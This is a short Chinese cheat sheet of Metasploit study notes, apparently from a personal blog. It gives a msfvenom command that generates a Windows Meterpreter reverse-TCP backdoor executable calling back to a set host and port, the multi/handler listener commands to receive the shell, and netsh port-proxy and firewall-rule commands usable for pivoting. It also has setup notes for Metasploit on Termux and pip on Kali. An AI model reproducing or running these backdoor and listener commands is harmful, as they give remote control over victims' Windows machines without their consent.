MSF日常学习
一些乱七八糟的东西
生成后门
使用msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.105.100.1 LPORT=4444 -f exe > winc.exe
开启监听
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
run
Windows网络代理
netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport
netsh advfirewall firewall add rule name=”pdd” protocol=TCP dir=in localip=10.105.105.3 localport=2001 action=allow
netsh interface portproxy reset
Termux
数据库启动
pg_ctl -D $PREFIX/var/lib/postgresql start
安装命令
pkg install unstable-repo
pkg install metasploit
资料
MSf详解
https://www.freebuf.com/news/210292.html
Windows代理
https://www.freebuf.com/articles/system/176889.html
Pip
新版的kali中内置的python没有安装pip
pip(python2)安装:
https://bootstrap.pypa.io/2.6/get-pip.py
python2 get-pip.py
pip -V
pip3(python3)安装
https://bootstrap.pypa.io/get-pip.py
python3 get-pip.py
pip -V